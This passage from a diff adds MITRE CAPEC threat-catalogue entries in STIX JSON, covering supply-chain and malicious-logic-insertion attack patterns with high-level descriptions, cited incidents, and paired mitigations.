"http://www.mindpride.net/root/Extras/how-stuff-works/how_computer_viruses_work.htm" + } + ], + "id": "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Infected Software", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": 
"2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c" + ], + "x_capec_prerequisites": [ + "Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-virus products to detect and quarantine software with known virus.", + "id": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-442-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "spec_version": "2.1", + "target_ref": "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": 
"An adversary uses their privileged position within an authorized development organization to inject malicious logic into a codebase or product.", + "external_references": [ + { + "external_id": "CAPEC-443", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/443.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Ax Sharma, Dev corrupts NPM libs 'colors' and 'faker' breaking thousands of apps, 2022--01---09, BleepingComputer", + "external_id": "REF-704", + "source_name": "reference_from_CAPEC", + "url": "https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/" + }, + { + "description": "Alberto Pellitteri, Malicious modifications to open source projects affecting thousands, 2022--01---12, SysDig", + "external_id": "REF-705", + "source_name": "reference_from_CAPEC", + "url": "https://sysdig.com/blog/malicious-modifications-detection-sysdig/" + } + ], + "id": "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Inserted Into Product by Authorized Developer", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In January 2022 the author of popular JavaScript packages \"Faker\" and \"colors\", used for generating mock data and including colored text within NodeJS consoles respectively, introduced malicious code that resulted in a Denial of Service (DoS) via an infinite loop. When applications that leveraged these packages updated to the malicious version, their applications executed the infinite loop and output gibberish ASCI characters endlessly. This resulted in the application being unusable until a stable version of the package was obtained. [REF-705]\n ", + "During initial development, an authorized hardware developer implants a malicious microcontroller within an Internet of Things (IOT) device and programs the microcontroller to communicate with the vulnerable device. Each time the device initializes, the malicious microcontroller's code is executed, which ultimately provides the adversary with backdoor access to the vulnerable device. This can further allow the adversary to sniff network traffic, exfiltrate date, execute unauthorized commands, and/or pivot to other vulnerable devices." + ], + "x_capec_extended_description": "\n Supply chain attacks from approved or trusted developers are extremely difficult to detect as it is generally assumed the quality control and internal security measures of these organizations conform to best practices. In some cases the malicious logic is intentional, embedded by a disgruntled employee, programmer, or individual with an otherwise hidden agenda. 
In other cases, the integrity of the product is compromised by accident (e.g. by lapse in the internal security of the organization that results in a product becoming contaminated). In further cases, the developer embeds a backdoor into a product to serve some purpose, such as product support, but discovery of the backdoor results in its malicious use by adversaries. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the product during the initial or continuous development." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software and hardware during development and prior to deployment to ensure that it functions as intended and without any malicious functionality. 
This includes both initial development, as well as updates propagated to the product after deployment.", + "id": "course-of-action--959db216-95a2-4c6c-abbb-16795259ad74", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-443-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f5aad68-5c68-4086-b215-b6715a590d4b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--959db216-95a2-4c6c-abbb-16795259ad74", + "spec_version": "2.1", + "target_ref": "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies a technology, product, or component during its development to acheive a negative impact once the system is deployed. The goal of the adversary is to modify the system in such a way that the negative impact can be leveraged when the system is later deployed. Development alteration attacks may include attacks that insert malicious logic into the system's software, modify or replace hardware components, and other attacks which negatively impact the system during development. These attacks generally require insider access to modify source code or to tamper with hardware components. 
The product is then delivered to the user where the negative impact can be leveraged at a later time.", + "external_references": [ + { + "external_id": "CAPEC-444", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/444.html" + } + ], + "id": "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Development Alteration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Unreliable Execution" + ], + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "attack-pattern--ca626464-877a-4f42-83b7-7451cfe71a38", + "attack-pattern--bfb711d6-f12d-496e-88b9-2c0184485976", + "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb" + ], + 
"x_capec_prerequisites": [ + "Access to the system during the development phase to alter and/or modify software and hardware components. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software and software components during development and prior to deployment to ensure that they function as intended and without any malicious functionality.", + "id": "course-of-action--d8829b7c-69b5-4edf-8446-07f8efda3255", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-444-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f05e05a-2eec-4147-a5b0-18b6c29ec5da", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8829b7c-69b5-4edf-8446-07f8efda3255", + "spec_version": "2.1", + "target_ref": "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits a configuration management system so that malicious logic is inserted into a software products build, update or deployed environment. 
If an adversary can control the elements included in a product's configuration management for build they can potentially replace, modify or insert code files containing malicious logic. If an adversary can control elements of a product's ongoing operational configuration management baseline they can potentially force clients receiving updates from the system to install insecure software when receiving updates from the server.\n ", + "external_references": [ + { + "external_id": "CAPEC-445", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/445.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Chef Manage deserializes cookie data insecurely, 2016--05---17, Carnegie Mellon University", + "external_id": "REF-706", + "source_name": "reference_from_CAPEC", + "url": "https://www.kb.cert.org/vuls/id/586503" + } + ], + "id": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Insertion into Product Software via Configuration Management Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + 
"x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n In 2016, the policy-based configuration management system Chef was shown to be vulnerable to remote code execution attacks based on its Chef Manage add-on improperly deserializing user-driven cookie data. This allowed unauthenticated users the ability to craft cookie data that executed arbitrary code with the web server's privileges. [REF-706]\n " + ], + "x_capec_extended_description": "\n Configuration management servers operate on the basis of a client pool, instructing each client on which software to install. In some cases the configuration management server will automate the software installation process. A malicious insider or an adversary who has compromised the server can alter the software baseline that clients must install, allowing the adversary to compromise a large number of satellite machines using the configuration management system. If an adversary can control elements of a product's configuration management for its deployed environment they can potentially alter fundamental security properties of the system based on assumptions that secure configurations are in place. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the configuration management system during deployment or currently deployed at a victim location. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality.", + "id": "course-of-action--aa94cc6d-559e-4d78-ac28-7d751abed25b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-445-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b2e787f-2034-4a16-8515-37dddac4930a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aa94cc6d-559e-4d78-ac28-7d751abed25b", + "spec_version": "2.1", + "target_ref": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e626d148-d65c-4d3a-b600-e59852d41f84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "spec_version": "2.1", + "target_ref": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary 
conducts supply chain attacks by the inclusion of insecure third-party components into a technology, product, or code-base, possibly packaging a malicious driver or component along with the product before shipping it to the consumer or acquirer.\n ", + "external_references": [ + { + "external_id": "CAPEC-446", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/446.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Thomas Brewster, How Lenovo's Superfish 'Malware' Works And What You Can Do To Kill It, 2015--02---19, Forbes", + "external_id": "REF-707", + "source_name": "reference_from_CAPEC", + "url": "https://www.forbes.com/sites/thomasbrewster/2015/02/19/superfish-need-to-know/?sh=991ab8c38776" + }, + { + "description": "Dan Goodin, Lenovo PCs ship with man-in-the-middle adware that breaks HTTPS connections, 2015--02---19, Ars Technica", + "external_id": "REF-708", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2015/02/lenovo-pcs-ship-with-man-in-the-middle-adware-that-breaks-https-connections/" + }, + { + "description": "Rob Graham, Extracting the SuperFish certificate, 2015--02---19, Errata Security", + "external_id": "REF-709", + "source_name": "reference_from_CAPEC", + "url": "https://blog.erratasec.com/2015/02/extracting-superfish-certificate.html#.VOX5Ky57RqE" + }, + { + "description": "Jordan Robertson, 
Michael Riley, The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies, 2018--10---04, Bloomberg", + "external_id": "REF-713", + "source_name": "reference_from_CAPEC", + "url": "https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies" + } + ], + "id": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Insertion into Product via Inclusion of Third-Party Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n From mid-2014 to early 2015, Lenovo computers were shipped with the Superfish Visual Search software that ultimately functioned as adware on the system. The Visual Search installation included a self-signed root HTTPS certificate that was able to intercept encrypted traffic for any site visited by the user. Of more concern was the fact that the certificate's corresponding private key was the same for every Lenovo machine. Once the private key was discovered [REF-709], an adversary could then conduct an Adversary-in-the-Middle (AitM) attack that would go undetected by machines that had this certificate installed on it. Adversaries could then masquerade as legitimate entities such as financial institutions, popular corporations, or other secure destinations on the Internet. [REF-708]\n ", + "\n In 2018 it was discovered that Chinese spies infiltrated several U.S. 
government agencies and corporations as far back as 2015 by including a malicious microchip within the motherboard of servers sold by Elemental Technologies to the victims. Although these servers were assembled via a U.S. based company, the motherboards used within the servers were manufactured and maliciously altered via a Chinese subcontractor. Elemental Technologies then sold these malicious servers to various U.S. government agencies, such as the DoD and CIA, and corporations like Amazon and Apple. The malicious microchip provided adversaries with a backdoor into the system, which further allowed them to access any network that contained the exploited systems, to exfiltrate data to be sent to the Chinese government.[REF-713]\n " + ], + "x_capec_extended_description": "\n The result is a window of opportunity for exploiting the product until the insecure component is discovered. This supply chain threat can result in the installation of malicious software or hardware that introduces widespread security vulnerabilities within an organization. Additionally, because software often depends upon a large number of interdependent libraries and components to be present, security holes can be introduced merely by installing Commercial off the Shelf (COTS) or Open Source Software (OSS) software that comes pre-packaged with the components required for it to operate. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the product during the initial or continuous development. This access is often obtained via insider access to include the third-party component after deployment." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6a471245-bafa-4239-b3da-e58e7488d129", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--959db216-95a2-4c6c-abbb-16795259ad74", + "spec_version": "2.1", + "target_ref": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Don't assume popular third-party components are free from malware or vulnerabilities. For software, assess for malicious functionality via update/commit reviews or automated static/dynamic analysis prior to including the component within the application and deploying in a production environment.", + "id": "course-of-action--1b041562-6f87-4aa3-94d2-6cc9b68a540f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-446-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3109571-f239-4195-af76-8ba87f02afce", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b041562-6f87-4aa3-94d2-6cc9b68a540f", + "spec_version": "2.1", + "target_ref": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "type": "relationship", + "x_capec_version": "3.9" + 
}, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies the design of a technology, product, or component to acheive a negative impact once the system is deployed. In this type of attack, the goal of the adversary is to modify the design of the system, prior to development starting, in such a way that the negative impact can be leveraged when the system is later deployed. Design alteration attacks differ from development alteration attacks in that design alteration attacks take place prior to development and which then may or may not be developed by the adverary. Design alteration attacks include modifying system designs to degrade system performance, cause unexpected states or errors, and general design changes that may lead to additional vulnerabilities. These attacks generally require insider access to modify design documents, but they may also be spoofed via web communications. The product is then developed and delivered to the user where the negative impact can be leveraged at a later time.", + "external_references": [ + { + "external_id": "CAPEC-447", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/447.html" + } + ], + "id": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Design Alteration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Unreliable Execution" + ], + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + 
"x_capec_parent_of_refs": [ + "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e" + ], + "x_capec_prerequisites": [ + "Access to system design documentation prior to the development phase. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have.", + "Ability to forge web communications to deliver modified design documentation." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess design documentation prior to development to ensure that they function as intended and without any malicious functionality.", + "id": "course-of-action--e68b1c60-e63a-4c2f-bc78-1be3494a0031", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-447-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a78cd3b8-5b83-473a-a2b9-a4f2f8eb4a52", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e68b1c60-e63a-4c2f-bc78-1be3494a0031", + "spec_version": "2.1", + "target_ref": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that design documentation is saved in a secure location and has proper access controls set in place to avoid unnecessary modification.", + "id": "course-of-action--a24db5bc-0875-48f1-b156-cd237ebeddad", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-447-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--54127afd-7b03-4cb6-b49b-ae02838e829c", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a24db5bc-0875-48f1-b156-cd237ebeddad", + "spec_version": "2.1", + "target_ref": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tampers with a DLL and embeds a computer virus into gaps between legitimate machine instructions. These gaps may be the result of compiler optimizations that pad memory blocks for performance gains. 
The embedded virus then attempts to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop.", + "external_references": [ + { + "external_id": "CAPEC-448", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/448.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Obfuscated Files or Information: Embedded Payloads", + "external_id": "T1027.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/009" + } + ], + "id": "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Embed Virus into DLL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0abd6ec-3ef1-4bad-88ac-615c6674b4d5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "spec_version": "2.1", + "target_ref": "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Malware Infection into Product Software. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-449", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/449.html" + } + ], + "id": "attack-pattern--3a127c86-c569-4de3-a328-1c1b45a9f986", + 